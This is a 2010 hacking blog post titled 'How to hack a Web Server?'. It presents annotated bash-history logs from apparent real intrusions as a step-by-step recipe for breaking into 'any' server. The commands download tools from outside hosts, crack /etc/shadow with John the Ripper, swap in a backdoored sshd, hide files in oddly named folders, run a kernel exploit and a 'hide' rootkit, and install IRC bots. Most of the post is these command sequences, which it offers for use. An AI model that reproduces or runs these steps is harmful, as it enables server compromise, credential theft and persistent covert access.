Welcome to my site. Please CLICK HERE to give your opinions regarding this new look of "PCTipsbyAnu". Thanks for visiting.

Friday, December 17, 2010

Browse » Home » , , , , , , , » How to hack a Web Server?

How to hack a Web Server?

Friday, December 17, 2010 Anu


Did u want to hack into a Web Server?
If YES! thn i'll give you the way to hack into any Web Server. A simple pair of commands can do it for you, so, lets check it... 
STARTING WITH BASH SHELL:

w

The first command they ran was "w" which was probably to see who wasonline and if root was sitting at the console or not and OF COURSEcheck the uptime maybe to take a guess as to when the last reboot was.This helps find an exploit that the machine may not have installed.Though this tech works better on Windows where EVERY patch needs areboot.
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
They used wget to grab a file on their own website which was a hacked version of a common application used by admin.
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow
They remove the downloaded file so the admin doesn't find.
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
Editing the header file.
cd ../..
./configure --without-x
make
make install
Installing the backdoored app.
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
Removing the actual applications to make room for their hacked copy.
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
A mild **** up
w
Check if anyone is going to notice a reboot
reboot

Lets Over.....

Now here is the all above commands in a pair :
w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot

Ok
Now here i provide you some other pair of commands, lets check them n ....


.bash_history
Code:
w
passwd
changed password
Code:
w
cd /var/tmp
ls
hostname -f
mkdir " "
cd " "
A nice hard to find folder
Code:
ls
pwd
wget esteticu.org/mremap_pte
chmod +x mremap_pte
./mremap_pte
old kernel exploit (ptrace) won't work
Code:
w
rm -rf mremap_pte
wget www.partyzone.go.ro/hide.tgz
tar xzvf hide.tgz
./hide root 0 0
Dude.. you arn't root.. that won't work
Code:
ls
rm -rf hide
rm -rf hide.tgz
wget ideo.go.ro/psy6667.tgz
tar xzvf psy6667.tgz
rm -rf psy6667.tgz
cd psybnc
chmod +x psybnc
mv psybnc backup
PATH="./"
backup
ls
rm -rf backup
kilall -9 psybnc
rm -rf psybnc
exit
Ok.. so you installed a irc-bot as a 'normal' user behind a NAT(he could have known this won't work) while you have a valid login(with your own password)..
Code:
export PATH='.'
psybnc
ls
exit
Still won't work
Code:
export PATH='.'
crond
exit
I don't get it.. perhaps there is also a 'fake' crond exec in the psybnc package..
Code:
ww
typo
Code:
w
cd /var/tmp
ls
cd " "
ls
killall -9 psybnc
rm -rf psbnc
uname -a
Should have done that a bit earlier.. could have saved you some time
Code:
wget www.skimy.go.ro/psy.tgz
tar xzvf psy.tgz
cd psybnc
sh
ls
killall -9 psybnc
rm -rf psybnc
rm -rf backup
cd ..
ls
rm -rf psy.tgz
rm -rf psybnc
OK he found out such a bot won't work behind a NAT
Code:
wget artist.idilis.ro/xpl.tgz
tar xzvf xpl.tgz
rm -rf xpl.tgz
mv mech "..   .bot"
cd "..   .bot"
sh
And that's where the bot send enough mail to trigger the ISP to kill the connection :P
ha ha ha haaaaaa
i think tht u can understand them...
Thanks... 
Posted in , , , , , , ,
You can leave a response, or trackback from your own site.

About 'Anu': My name is 'Anu' also Known as 'ANU 007 TIGER' .I'm administrator of 'PC Tips by Anu' blog .This blog was opened for sharing contents about hacking n cracking.
Thanks YAHOO OR GMAIL

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Back to Top